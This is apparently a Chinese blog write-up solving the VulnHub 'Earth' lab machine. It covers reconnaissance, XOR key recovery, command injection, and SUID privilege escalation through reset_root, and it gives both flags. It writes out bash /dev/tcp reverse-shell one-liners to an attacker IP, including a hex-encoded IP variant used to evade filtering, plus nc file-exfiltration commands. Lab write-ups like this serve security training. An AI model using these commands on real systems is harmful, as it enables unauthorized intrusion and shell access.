加我v 拉群深入技术交流:To_be_w1th0ut

文章目录

前言
靶机信息
一、信息收集
- 主机发现&端口扫描
二、尝试打点，突破边界
三、拿shell
四、提权

前言

记录vuln靶场扫荡第二天2022.11.12：

本篇文章不李姐的点是nmap如何扫描出dns解析域名信息的

靶机信息

难度：简单
下载地址：https://download.vulnhub.com/theplanets/Earth.ova

提示信息: Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com, though it may take a while for me to get back to you.
百度翻译:
地球是一个容易的盒子，尽管在本系列中，你可能会发现它比水星更具挑战性，而且在容易的一面，这取决于你的经验。该框上有两个标志：用户标志和根标志，其中包括md5哈希。

一、信息收集

主机发现&端口扫描

nmap -PR 192.168.200.0/24

-Pn不进行ping扫描
-sn不进行端口扫描只进行主机发现

发现开放22，80，443端口
22：ssh服务
80：http服务
443：https服务

nmap -A -sV -p 1-65535  192.168.200.133

打靶场建议扫描全端口：计算机总的端口号有65535个

二、尝试打点，突破边界

发现搭载web服务，用浏览器访问一下

发现找nmap扫描结果中出现

目标机开了22端口和80端口和443端口，443端口中配置了两个DNS，需要修改hosts文件指定IP。
没修改hosts之前访问http://192.168.200.33时返回Bad Request(400)错误。

访问https://192.168.200.133也是同样的400错误

以下是百度百科对于400状态码的解释

这时我们需要配置一下本机的hosts文件

#linux
vim /etc/hosts
#按下i编辑 在ipv4多加一行 前面的ip地址要对应在你们电脑上靶机的ip地址 不要照抄
192.168.200.133 earth.local terratest.earth.local

如下图

访问earth.local

随便输了点东西进去感觉没啥用

啥也看不出来
扫描以下目录吧

dirsearch -u earth.local

爆出以下结果

那不妨再扫扫另一个站（看起来像是一个测试用的站点没撤掉）

dirsearch -u terratest.earth.local

我们访问一下扫出的结果

https://terratest.earth.local/robots.txt

发现在末尾有一个testingnotes.* 不知道文件后缀
我们可以尝试整个后缀名字典fuzz一下，这里我只是浅尝了一下txt没想到就出来结果了
访问地址

https://terrate.earth.local/testingnote.txt

翻译一下：测试安全消息系统注意事项：
*使用 XOR 加密作为算法，在 RSA 中使用应该是安全的。
*地球已确认他们已收到我们发送的消息。
*testdata.txt 用于测试加密。
*terra 用作管理门户的用户名。
去做：
*我们如何安全地将我们的每月密钥发送到地球？还是我们应该每周更换密钥？
*需要测试不同的密钥长度以防止暴力破解。钥匙应该多长？
*需要改进消息界面和管理面板的界面，目前非常基础。

提到了testdata.txt的文本适用于测试加密的，或许会对我们破解有利

wget https://terratest.earth.local/testdata.txt --no-check-certificate
# wget下载https开头的网址域名 时报错，你需要加上 --no-check-certificate (不检查证书)

文本内容：
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth’s history, life appeared in the oceans and began to affect Earth’s atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
翻译一下：
根据辐射测年估计和其他证据，地球形成于45亿年前。在地球历史的头10亿年里，海洋中出现了生命，并开始影响地球的大气和表面，导致厌氧生物和后来的需氧生物的繁殖。一些地质证据表明，生命可能早在41亿年前就出现了。
啥都没看出来说实话，但是他说这个是密码的测试文档，再结合XOR的异或
写个脚本破解

import binascii
testdata = binascii.b2a_hex(open('testdata.txt','rb').read()).decode()
for i in open('passwd.txt','r'):i = i.replace('\n','')print(hex(int(i,16) ^ int(testdata,16)))

运行后的输出结果为

0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973436679202f2f7d6f6d6f3b2f70706561726527327e643b7f662427782c7f6a6a3d2a616c66332c6f717c79247736267c25516a76772b55203c40663b792f6a7f6b72307e683c506a31732e3d066997f3dc732d712c3c6a247b75676e247536267f2a2b6f2765726c6a7c6d6e6e2f3f3b2d277f31252c667b6b78382e607f6229228ce5996e70607573742a797a64317d7862693a6f7b297e73687d2c5e3623546a637937616a2c796e3e4868752d17736b6c2924496e2a27792f6479626a377074347e7522743d356a6768262379782a2b6677693d2f65617079726e63616e786b797f382f6b3c0b363d2b3180e8da712a497238786f22507c377766626e
0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973746f72792c206c69666520617070656172656420696e20746865206f6365616e7320616e6420626567616e20746f2061666665637420456172746827732061746d6f73706865726520616e6420737572666163652c206c656164696e6720746f207468652070726f6c5e72726c6a7e3c6576797f7b262a786b7c68246b61772d6f6320302d2777656231343669716324687465376166236065637e296f3e6b466e6b756b7a64747c613e797e63697976627e6a6e24364f3f30697e7f647c30767c246c78347e25356c33642a606d783661387b76636b65746469612025652c7b747239783e717b3177246826767e6f6178782d296966347476367075646b
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

把它进行文本转换后（十六进制转字符串）
是循环的

earthclimatechangebad4humans

使用账号：terra 密码:earthclimatechangebad4humans尝试登录后，登陆成功
出现命令行

执行完ls后发现就是命令注入了

三、拿shell

直接尝试反弹shell
kali监听4444端口

netcat -lvvp 4444

在命令注入框输入

bash -i >& /dev/tcp/192.168.200.128/4444 0>&1

有点儿尴尬
不允许远程连接
尝试了很多shell反弹姿势都不行，打会篮球吧
想着就命令行找flag吧

find / -name "*flag*"

看到一个比较明显的文档

拿下第一个flag

[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

在尝试shell反弹想到了可以对ip地址进行转换格式来尝试

bash -i >& /dev/tcp/0xC0.0xA8.0xC8.0x80/4444 0>&1

反弹shell成功

四、提权

查找有权限的文件

find查找有权限的文件
find / -perm -u=s -type f 2>/dev/null

find / -perm -u=s -type f 2>/dev/null
find / -perm /u=s -type f 2>/dev/null
-perm 按权限查找 ugo(用户/组/其他) rwx(读/写/执行)
S 为SUID/SGID特殊权限
-type 文件类型f->文件 d->文件夹
2>/dev/null 不显示错误信息 2->错误输出(0->标准输入; 1->标准输出) >(先清除再写入) or >>(追加) /dev/null位桶(黑洞),接受到的任何数据都会被丢弃

这个文件的名字比较可疑

执行它，发现报错,靶机上没有工具,把他下载到kali中分析一下

攻击机：nc -nlvp 1234 >reset_root
靶机:nc 192.168.43.118 1234 < /usr/bin/reset_root

kali(攻击机):

靶机：

使用strace分析，我这里没有就下载一下

执行分析前记得先给文件权限

strace要加绝对路径（先输入pwd查看当前的路径）
发现问题出在这

我们直接添加这三个文件

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

wocao 加错地方了，应该在靶机上加这三个文件，然后运行reset_root
创建文件后

执行成功密码重置为Earth（注意大小写）

尝试切换到root用户并且输入密码

成了~
查看一下第二个flag
到root目录下查看root_flag.txt文件

收工

不好意思没截完

[root_flag_b0da9554d29db2117b02aa8b66ec492e]

No.2 Earth相关推荐

AI EARTH再立功，达摩院包揽遥感AI领域三项冠军
人类赖以生存的地球表面积大约为5.1亿平方公里,而陆地面积仅占29.2%,这些土地历经数十亿年的演变及人类生活的改造,又被分割成耕地.森林.草地.水域及建筑等等,现在,AI正在成为管理陆地资源的新途径 ...
点云距离度量：完全解析EMD距离(Earth Mover's Distance)
点击上方"3D视觉工坊",选择"星标" 干货第一时间送达作者丨刘昕宸@知乎来源丨https://zhuanlan.zhihu.com/p/270675634 ...
wasserstein距离_EMD(earth mover#x27;s distances)距离
对于离散的概率分布,Wasserstein距离也被描述为推土距离(EMD).如果我们将分布想象为两个有一定存土量的土堆,那么EMD就是将一个土堆转换为另一个土堆所需的最小总工作量.工作量的定义是 ...
形象！Google Earth增实时雨雪演示功能
Google Earth是一款Google公司开发的虚拟地球仪软件,将卫星照片.航空照相和GIS布置在一个地球的三维模型上.最近,Google Earth发布了5.2版,新增雨雪天气实时演示模式,可看 ...
3D大脑图谱-Julich-Brain被称作“Google Earth of the brain”
Julich-Brain 是人类大脑的第一个3-D 图谱的名称,它以微观分辨率反映了大脑结构的可变性.该图谱具有近 250 个结构不同的区域,每个区域都基于对 10 个大脑的分析.超过24,000 个 ...
GPS模块输出的NMEA数据ddmm.mmmm转换成dd.ddddd,在google Earth Pro中描点
GPS模块输出的数据是NMEA格式,其中GPGGA字段包含我们需要的经纬度信息. 例:$GPGGA,092204.999,4250.5589,S,14718.5084,E,1,04,24.4,12.2 ...
Earth Mover's Distance (EMD)距离
原文: http://d.hatena.ne.jp/aidiary/20120804/1344058475 作者: sylvan5 翻译: Myautsai和他的朋友们(Google Translat ...
2021 “AI Earth”人工智能创新挑战赛 AI助力精准气象和海洋预测
这里揭露一下天池比赛里活跃着的部分小号行为. 在AI earth比赛里,12点提交截止,但运行时间最长6小时,因此12点到18点仍然有机会刷新排行榜,所以大家可能还有一次提分机会.16点南京某大学的人 ...
可视化之Earth NullSchool
上两篇我们分别介绍了<Berkeley Earth>和<AQICN>两个网站,今天来看一下Earth NullSchool. 这个网站的特色是风向图,之前有一篇可视化之风向图, ...
Google Earth 8.0
前几天有看到全新的Google Earth 8.0升级,刚好适合自己的手机应用. Google Earth 8.0 官方下载:https://play.google.com/store/apps/de ...

No.2 Earth